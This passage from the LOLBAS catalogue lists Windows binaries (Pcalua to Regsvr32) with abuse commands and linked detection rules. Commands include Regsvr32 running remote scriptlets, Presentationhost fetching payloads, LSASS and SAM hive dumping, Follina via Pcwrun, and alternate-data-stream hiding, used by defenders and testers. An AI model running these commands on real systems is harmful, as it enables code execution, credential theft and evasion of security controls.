  - Link: https://github.com/LOLBAS-Project/LOLBAS/pull/153
Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'

================================================
FILE: yml/OSBinaries/Pcalua.yml
================================================
---
Name: Pcalua.exe
Description: Program Compatibility Assistant
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: pcalua.exe -a {PATH:.exe}
    Description: Open the target .EXE using the Program Compatibility Assistant.
    Usecase: Proxy execution of binary
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: pcalua.exe -a {PATH_SMB:.dll}
    Description: Open the target .DLL file with the Program Compatibility Assistant.
    Usecase: Proxy execution of remote dll file
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: DLL
      - Execute: Remote
  - Command: pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java
    Description: Open the target .CPL file with the Program Compatibility Assistant.
    Usecase: Execution of CPL files
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Windows\System32\pcalua.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml
Resources:
  - Link: https://twitter.com/KyleHanslovan/status/912659279806640128
Acknowledgement:
  - Person: Kyle Hanslovan
    Handle: '@kylehanslovan'
  - Person: Fab
    Handle: '@0rbz_'

================================================
FILE: yml/OSBinaries/Pcwrun.yml
================================================
---
Name: Pcwrun.exe
Description: Program Compatibility Wizard
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: Pcwrun.exe {PATH_ABSOLUTE:.exe}
    Description: Open the target .EXE file with the Program Compatibility Wizard.
    Usecase: Proxy execution of binary
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: Pcwrun.exe /../../$(calc).exe
    Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
    Usecase: Proxy execution of binary
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Windows\System32\pcwrun.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml
Resources:
  - Link: https://twitter.com/pabraeken/status/991335019833708544
  - Link: https://twitter.com/nas_bench/status/1535663791362519040
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
  - Person: Nasreddine Bencherchali
    Handle: '@nas_bench'

================================================
FILE: yml/OSBinaries/Pktmon.yml
================================================
---
Name: Pktmon.exe
Description: Capture network packets on Windows 10 with the October 2018 Update or later.
Author: Derek Johnson
Created: 2020-08-12
Commands:
  - Command: pktmon.exe start --etw
    Description: Will start a packet capture and store the log file as PktMon.etl. Use pktmon.exe stop to end the capture.
    Usecase: Use this built-in network sniffer on Windows 10 to capture sensitive traffic
    Category: Reconnaissance
    Privileges: Administrator
    MitreID: T1040
    OperatingSystem: Windows 10 1809 and later, Windows 11
  - Command: pktmon.exe filter add -p 445
    Description: Select desired ports for packet capture
    Usecase: Look for interesting traffic such as telnet or FTP
    Category: Reconnaissance
    Privileges: Administrator
    MitreID: T1040
    OperatingSystem: Windows 10 1809 and later, Windows 11
Full_Path:
  - Path: c:\windows\system32\pktmon.exe
  - Path: c:\windows\syswow64\pktmon.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml
  - IOC: .etl files found on system
Resources:
  - Link: https://binar-x79.com/windows-10-secret-sniffer/
Acknowledgement:
  - Person: Derek Johnson

================================================
FILE: yml/OSBinaries/Pnputil.yml
================================================
---
Name: Pnputil.exe
Description: Used for installing drivers
Author: Hai Vaknin (Lux)
Created: 2020-12-25
Commands:
  - Command: pnputil.exe -i -a {PATH_ABSOLUTE:.inf}
    Description: Used for installing drivers
    Usecase: Add malicious driver
    Category: Execute
    Privileges: Administrator
    MitreID: T1547
    OperatingSystem: Windows 7, Windows 10, Windows 11
    Tags:
      - Execute: INF
Full_Path:
  - Path: C:\Windows\system32\pnputil.exe
Code_Sample:
  - Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml
Acknowledgement:
  - Person: Hai Vaknin (Lux)
    Handle: '@LuxNoBulIshit'
  - Person: Avihay Eldad
    Handle: '@aloneliassaf'

================================================
FILE: yml/OSBinaries/Presentationhost.yml
================================================
---
Name: Presentationhost.exe
Description: File is used for executing Browser applications
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: Presentationhost.exe {PATH_ABSOLUTE:.xbap}
    Description: Executes the target XAML Browser Application (XBAP) file
    Usecase: Execute code within XBAP files
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: XBAP
  - Command: Presentationhost.exe {REMOTEURL}
    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Windows\System32\Presentationhost.exe
  - Path: C:\Windows\SysWOW64\Presentationhost.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml
  - IOC: Execution of .xbap files may not be common on production workstations
Resources:
  - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
  - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
  - Person: Nir Chako (Pentera)
    Handle: '@C_h4ck_0'

================================================
FILE: yml/OSBinaries/Print.yml
================================================
---
Name: Print.exe
Description: Used by Windows to send files to the printer
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}
    Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
    Usecase: Hide binary file in alternate data stream to potentially bypass defensive countermeasures
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe}
    Description: Copy file from source to destination
    Usecase: Copy files
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe}
    Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
    Usecase: Copy/Download file from remote server
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\print.exe
  - Path: C:\Windows\SysWOW64\print.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml
  - IOC: Print.exe retrieving files from internet
  - IOC: Print.exe creating executable files on disk
Resources:
  - Link: https://twitter.com/Oddvarmoe/status/985518877076541440
  - Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/PrintBrm.yml
================================================
---
Name: PrintBrm.exe
Description: Printer Migration Command-Line Tool
Author: Elliot Killick
Created: 2021-06-21
Commands:
  - Command: PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip}
    Description: Create a ZIP file from a folder in a remote drive
    Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder}
    Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
    Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
Full_Path:
  - Path: C:\Windows\System32\spool\tools\PrintBrm.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml
  - IOC: PrintBrm.exe should not be run on a normal workstation
Resources:
  - Link: https://twitter.com/elliotkillick/status/1404117015447670800
Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'

================================================
FILE: yml/OSBinaries/Provlaunch.yml
================================================
---
Name: Provlaunch.exe
Description: Launcher process
Author: Grzegorz Tworek
Created: 2023-06-30
Commands:
  - Command: provlaunch.exe LOLBin
    Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.'
    Usecase: Executes arbitrary command
    Category: Execute
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
    Tags:
      - Execute: CMD
Full_Path:
  - Path: c:\windows\system32\provlaunch.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml
  - IOC: c:\windows\system32\provlaunch.exe executions
  - IOC: Creation/existence of HKLM\SOFTWARE\Microsoft\Provisioning\Commands subkeys
Resources:
  - Link: https://twitter.com/0gtweet/status/1674399582162153472
Acknowledgement:
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'

================================================
FILE: yml/OSBinaries/Psr.yml
================================================
---
Name: Psr.exe
Description: Windows Problem Steps Recorder, used to record screen and clicks.
Author: Leon Rodenko
Created: 2020-06-27
Commands:
  - Command: psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0
    Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
    Usecase: Can be used to take screenshots of the user environment
    Category: Reconnaissance
    Privileges: User
    MitreID: T1113
    OperatingSystem: since Windows 7 (client) / Windows 2008 R2
Full_Path:
  - Path: c:\windows\system32\psr.exe
  - Path: c:\windows\syswow64\psr.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml
  - IOC: psr.exe spawned
  - IOC: suspicious activity when running with "/gui 0" flag
Resources:
  - Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx
Acknowledgement:
  - Person: Leon Rodenko
    Handle: '@L3m0nada'

================================================
FILE: yml/OSBinaries/Query.yml
================================================
---
Name: Query.exe
Description: Remote Desktop Services MultiUser Query Utility
Author: Idan Lerman
Created: 2025-07-31
Commands:
  - Command: query.exe user
    Description: Once executed, `query.exe` will execute `quser.exe` in the same folder. Thus, if `query.exe` is copied to a folder and an arbitrary executable is renamed to `quser.exe`, `query.exe` will spawn it. Instead of `user`, it is also possible to use `session`, `termsession` or `process` as command-line option.
    Usecase: Execute an arbitrary executable via trusted system executable.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Requires: Rename
Full_Path:
  - Path: c:\windows\system32\query.exe
  - Path: c:\windows\syswow64\query.exe
Detection:
  - IOC: query.exe being executed and executes a child process outside of its normal path of c:\windows\system32\ or c:\windows\syswow64\
Acknowledgement:
  - Person: Idan Lerman
    Handle: '@IdanLerman'

================================================
FILE: yml/OSBinaries/Rasautou.yml
================================================
---
Name: Rasautou.exe
Description: Windows Remote Access Dialer
Author: Tony Lambert
Created: 2020-01-10
Commands:
  - Command: rasautou -d {PATH:.dll} -p export_name -a a -e e
    Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
    Usecase: Execute DLL code
    Category: Execute
    Privileges: User, Administrator in Windows 8
    MitreID: T1218
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Windows\System32\rasautou.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml
  - IOC: rasautou.exe command line containing -d and -p
Resources:
  - Link: https://github.com/fireeye/DueDLLigence
  - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Acknowledgement:
  - Person: FireEye
    Handle: '@FireEye'

================================================
FILE: yml/OSBinaries/Rdrleakdiag.yml
================================================
---
Name: rdrleakdiag.exe
Description: Microsoft Windows resource leak diagnostic tool
Author: 'John Dwyer'
Created: 2022-05-18
Commands:
  - Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
    Description: Dump process by PID and create a dump file (creates files called `minidump_.dmp` and `results_.hlk`).
    Usecase: Dump process by PID.
    Category: Dump
    Privileges: User
    MitreID: T1003
    OperatingSystem: Windows
  - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
    Description: Dump LSASS process by PID and create a dump file (creates files called `minidump_.dmp` and `results_.hlk`).
    Usecase: Dump LSASS process.
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.001
    OperatingSystem: Windows
  - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap
    Description: After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_.dmp` and `results_.hlk`).
    Usecase: Dump LSASS process multiple times.
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.001
    OperatingSystem: Windows
Full_Path:
  - Path: c:\windows\system32\rdrleakdiag.exe
  - Path: c:\Windows\SysWOW64\rdrleakdiag.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml
  - Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html
  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
Resources:
  - Link: https://twitter.com/0gtweet/status/1299071304805560321?s=21
  - Link: https://www.pureid.io/dumping-abusing-windows-credentials-part-1/
  - Link: https://github.com/LOLBAS-Project/LOLBAS/issues/84
Acknowledgement:
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'

================================================
FILE: yml/OSBinaries/Reg.yml
================================================
---
Name: Reg.exe
Description: Used to manipulate the registry
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.reg
    Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
    Usecase: Hide/plant registry information in Alternate data stream for later use
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: reg save HKLM\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\SAM {PATH_ABSOLUTE:.3.bak}
    Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material
    Usecase: Dump credentials from the Security Account Manager (SAM)
    Category: Credentials
    Privileges: Administrator
    MitreID: T1003.002
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\reg.exe
  - Path: C:\Windows\SysWOW64\reg.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml
  - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml
  - IOC: reg.exe writing to an ADS
Resources:
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  - Link: https://pure.security/dumping-windows-credentials/
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/Regasm.yml
================================================
---
Name: Regasm.exe
Description: Part of .NET
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: regasm.exe {PATH:.dll}
    Description: Loads the target .NET DLL file and executes the RegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
    Category: AWL Bypass
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL (.NET)
  - Command: regasm.exe /U {PATH:.dll}
    Description: Loads the target .DLL file and executes the UnRegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
    Category: Execute
    Privileges: User
    MitreID: T1218.009
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL (.NET)
Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
  - Splunk: https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md
  - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml
  - IOC: regasm.exe executing dll file
Resources:
  - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
  - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'

================================================
FILE: yml/OSBinaries/Regedit.yml
================================================
---
Name: Regedit.exe
Description: Used by Windows to manipulate registry
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
    Description: Export the target Registry key to the specified .REG file.
    Usecase: Hide registry data in alternate data stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: regedit {PATH_ABSOLUTE}:regfile.reg
    Description: Import the target .REG file into the Registry.
    Usecase: Import hidden registry data from alternate data stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\regedit.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml
  - IOC: regedit.exe reading and writing to alternate data stream
  - IOC: regedit.exe should normally not be executed by end-users
Resources:
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/Regini.yml
================================================
---
Name: Regini.exe
Description: Used to manipulate the registry
Author: Oddvar Moe
Created: 2020-07-03
Commands:
  - Command: regini.exe {PATH}:hidden.ini
    Description: Write registry keys from data inside the Alternate data stream.
    Usecase: Write to registry
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\regini.exe
  - Path: C:\Windows\SysWOW64\regini.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml
  - IOC: regini.exe reading from ADS
Resources:
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
  - Person: Eli Salem
    Handle: '@elisalem9'

================================================
FILE: yml/OSBinaries/Register-cimprovider.yml
================================================
---
Name: Register-cimprovider.exe
Description: Used to register new wmi providers
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: Register-cimprovider -path {PATH_ABSOLUTE:.dll}
    Description: Load the target .DLL.
    Usecase: Execute code within dll file
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Windows\System32\Register-cimprovider.exe
  - Path: C:\Windows\SysWOW64\Register-cimprovider.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml
  - IOC: Register-cimprovider.exe execution and cmdline DLL load may be suspicious
Resources:
  - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
Acknowledgement:
  - Person: Philip Tsukerman
    Handle: '@PhilipTsukerman'

================================================
FILE: yml/OSBinaries/Regsvcs.yml
================================================
---
Name: Regsvcs.exe
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: regsvcs.exe {PATH:.dll}
    Description: Loads the target .NET DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
    Category: Execute
    Privileges: User
    MitreID: T1218.009
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL (.NET)
  - Command: regsvcs.exe {PATH:.dll}
    Description: Loads the target .NET DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
    Category: AWL Bypass
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL (.NET)
Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
  - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml
Resources:
  - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
  - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'

================================================
FILE: yml/OSBinaries/Regsvr32.yml
================================================
---
Name: Regsvr32.exe
Description: Used by Windows to register dlls
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: SCT
      - Execute: Remote
  - Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: SCT
  - Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
    Category: Execute
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: SCT
      - Execute: Remote
  - Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
    Category: Execute
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: SCT
  - Command: regsvr32.exe /s {PATH:.dll}
    Description: Execute code in a DLL. The code must be inside the exported function `DllRegisterServer`.
    Usecase: Execute DLL file
    Category: Execute
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: regsvr32.exe /u /s {PATH:.dll}
    Description: Execute code in a DLL. The code must be inside the exported function `DllUnRegisterServer`.
    Usecase: Execute DLL file
    Category: Execute
    Privileges: User
    MitreID: T1218.010
